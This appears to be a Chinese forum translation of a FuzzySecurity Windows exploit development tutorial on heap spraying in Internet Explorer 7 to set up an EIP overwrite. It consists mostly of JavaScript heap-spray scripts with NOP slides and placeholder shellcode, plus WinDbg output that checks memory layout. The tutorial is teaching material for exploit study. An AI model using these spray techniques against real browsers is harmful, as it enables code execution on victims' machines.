-
-
[翻译]Windows Exploit开发系列教程第八部分:堆喷射第一节[覆写EIP]
-
发表于:
2016-1-14 15:31
26660
-
[翻译]Windows Exploit开发系列教程第八部分:堆喷射第一节[覆写EIP]
<html>
<body>
<script language='javascript'>
var myvar = unescape(
'%u7546空卹'+ // ASCII
'捥牵瑩'+ // FuzzySecurity
'遹'); //
alert("allocation done");
</script>
</body>
</html>
s -a 0x00000000 L?7fffffff "FuzzySecurity"
d 032e3fdc
<html>
<body>
<script language='javascript'>
size = 0x3E8; // 1000-bytes
NopSlide = ''; // Initially set to be empty
var Shellcode = unescape(
'畆空卹'+ // ASCII
'捥牵瑩'+ // FuzzySecurity
'遹'); //
// Keep filling with nops till we reach 1000-bytes
for (c = 0; c < size; c++){
NopSlide += unescape('邐邐');}
// Subtract size of shelccode
NopSlide = NopSlide.substring(0,size - Shellcode.length);
// Spray our payload 50 times
var memory = new Array();
for (i = 0; i < 50; i++){
memory[i] = NopSlide + Shellcode;}
alert("allocation done");
</script>
</body>
</html>
"\x90"*(1000-len(shellcode)) + shellcode
0:013> s -a 0x00000000 L?7fffffff "FuzzySecurity"
02a4b03e 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
02a4b846 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
02a4c04e 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
[...Snip...]
0312e0f6 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
0312f0fe 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
03130106 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
Looking at 02a4c04e we can see the alignment is not perfect as there are allot
of junk bytes between blocks:
0:013> d 02a4c04e
02a4c04e 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
02a4c05e 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
02a4c06e 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
02a4c07e 00 00 00 00 00 00 00 00-00 00 59 c0 48 e8 00 01 ..........Y.H...
02a4c08e 28 ff d0 07 00 00 90 90-90 90 90 90 90 90 90 90 (...............
02a4c09e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
02a4c0ae 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
02a4c0be 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
However if we start from the last block and look back in steps of 1000-bytes we
can see the allocations look pretty good!
0:013> d 03130106-20
031300e6 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
031300f6 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
03130106 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
03130116 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
03130126 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
03130136 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
03130146 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
03130156 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0:013> d 03130106-20-1000
0312f0e6 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312f0f6 90 90 90 90 90 90 90 90-46 75 7a 7a 79 53 65 63 ........FuzzySec
0312f106 75 72 69 74 79 90 00 00-90 90 90 90 90 90 90 90 urity...........
0312f116 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312f126 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312f136 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312f146 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312f156 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0:013> d 03130106-20-2000
0312e0e6 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312e0f6 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
0312e106 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312e116 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312e126 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312e136 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312e146 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312e156 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0:013> d 03130106-20-3000
0312d0e6 90 90 90 90 90 90 90 90-46 75 7a 7a 79 53 65 63 ........FuzzySec
0312d0f6 75 72 69 74 79 90 00 00-90 90 90 90 90 90 90 90 urity...........
0312d106 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312d116 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312d126 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312d136 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312d146 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0312d156 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
<html>
<body>
<script language='javascript'>
var Shellcode = unescape(
'畆空卹'+ // ASCII
'捥牵瑩'+ // FuzzySecurity
'遹'); //
var NopSlide = unescape('邐邐');
var headersize = 20;
var slack = headersize + Shellcode.length;
while (NopSlide.length < slack) NopSlide += NopSlide;
var filler = NopSlide.substring(0,slack);
var chunk = NopSlide.substring(0,NopSlide.length - slack);
while (chunk.length + slack < 0x40000) chunk = chunk + chunk + filler;
var memory = new Array();
for (i = 0; i < 500; i++){ memory[i] = chunk + Shellcode }
alert("allocation done");
</script>
</body>
</html>
0:014> s -a 0x00000000 L?7fffffff "FuzzySecurity"
02a34010 46 75 7a 7a 79 53 65 63-75 72 69 74 79 0d 0a 20 FuzzySecurity..
030ca75c 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
03b4ffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
03c6ffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
03cfffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
03d8ffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
03e1ffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
03eaffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
03f3ffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
[...Snip...]
1521ffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
152affee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
1533ffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
153cffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
1545ffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
154effee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
1557ffee 46 75 7a 7a 79 53 65 63-75 72 69 74 79 90 00 00 FuzzySecurity...
0:014> !peb
PEB at 7ffd8000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: Yes
ImageBaseAddress: 00400000
Ldr 00251e90
Ldr.Initialized: Yes
Ldr.InInitializationOrderModuleList: 00251f28 . 002557d8
Ldr.InLoadOrderModuleList: 00251ec0 . 00255918
Ldr.InMemoryOrderModuleList: 00251ec8 . 00255920
Base TimeStamp Module
400000 46c108d9 Aug 14 09:43:53 2007 C:\Program Files\Utilu IE Collection\IE700\iexplore.exe
7c900000 4d00f29d Dec 09 23:15:41 2010 C:\WINDOWS\system32\ntdll.dll
7c800000 49c4f2bb Mar 21 21:59:23 2009 C:\WINDOWS\system32\kernel32.dll
77dd0000 49900be3 Feb 09 18:56:35 2009 C:\WINDOWS\system32\ADVAPI32.dll
77e70000 4c68fa30 Aug 16 16:43:28 2010 C:\WINDOWS\system32\RPCRT4.dll
[...Snip...]
767f0000 4c2b375b Jun 30 20:23:55 2010 C:\WINDOWS\system32\schannel.dll
77c70000 4aaa5b06 Sep 11 22:13:26 2009 C:\WINDOWS\system32\msv1_0.dll
76790000 4802a0d9 Apr 14 08:10:01 2008 C:\WINDOWS\system32\cryptdll.dll
76d60000 4802a0d0 Apr 14 08:09:52 2008 C:\WINDOWS\system32\iphlpapi.dll
SubSystemData: 00000000
ProcessHeap: 00150000
ProcessParameters: 00020000
CurrentDirectory: 'C:\Documents and Settings\Administrator\Desktop\'
WindowTitle: 'C:\Program Files\Utilu IE Collection\IE700\iexplore.exe'
ImageFile: 'C:\Program Files\Utilu IE Collection\IE700\iexplore.exe'
CommandLine: 'about:home'
[...Snip...]
0:014> !heap -stat -h 00150000
heap @ 00150000
group-by: TOTSIZE max-display: 20
size #blocks total ( %) (percent of total busy bytes)
7ffe0 1f4 - f9fc180 (98.63)
3fff8 3 - bffe8 (0.30)
1fff8 4 - 7ffe0 (0.20)
7ffd0 1 - 7ffd0 (0.20)
7ff8 b - 57fa8 (0.14)
fff8 5 - 4ffd8 (0.12)
1ff8 21 - 41ef8 (0.10)
3ff8 d - 33f98 (0.08)
ff8 f - ef88 (0.02)
7f8 18 - bf40 (0.02)
8fc1 1 - 8fc1 (0.01)
7fe0 1 - 7fe0 (0.01)
7fd0 1 - 7fd0 (0.01)
7db4 1 - 7db4 (0.01)
614 14 - 7990 (0.01)
57e0 1 - 57e0 (0.01)
20 208 - 4100 (0.01)
5e4 b - 40cc (0.01)
4e4 c - 3ab0 (0.01)
3980 1 - 3980 (0.01)
我们列出大小为0x7ffe0的块
0:014> !heap -flt s 7ffe0
_HEAP @ 150000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
03ad0018 fffc 0000 [0b] 03ad0020 7ffe0 - (busy VirtualAlloc)
03bf0018 fffc fffc [0b] 03bf0020 7ffe0 - (busy VirtualAlloc)
03c80018 fffc fffc [0b] 03c80020 7ffe0 - (busy VirtualAlloc)
03d10018 fffc fffc [0b] 03d10020 7ffe0 - (busy VirtualAlloc)
03da0018 fffc fffc [0b] 03da0020 7ffe0 - (busy VirtualAlloc)
03e30018 fffc fffc [0b] 03e30020 7ffe0 - (busy VirtualAlloc)
03ec0018 fffc fffc [0b] 03ec0020 7ffe0 - (busy VirtualAlloc)
03f50018 fffc fffc [0b] 03f50020 7ffe0 - (busy VirtualAlloc)
[...Snip...]
15110018 fffc fffc [0b] 15110020 7ffe0 - (busy VirtualAlloc)
151a0018 fffc fffc [0b] 151a0020 7ffe0 - (busy VirtualAlloc)
15230018 fffc fffc [0b] 15230020 7ffe0 - (busy VirtualAlloc)
152c0018 fffc fffc [0b] 152c0020 7ffe0 - (busy VirtualAlloc)
15350018 fffc fffc [0b] 15350020 7ffe0 - (busy VirtualAlloc)
153e0018 fffc fffc [0b] 153e0020 7ffe0 - (busy VirtualAlloc)
15470018 fffc fffc [0b] 15470020 7ffe0 - (busy VirtualAlloc)
15500018 fffc fffc [0b] 15500020 7ffe0 - (busy VirtualAlloc)
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
houjingyi
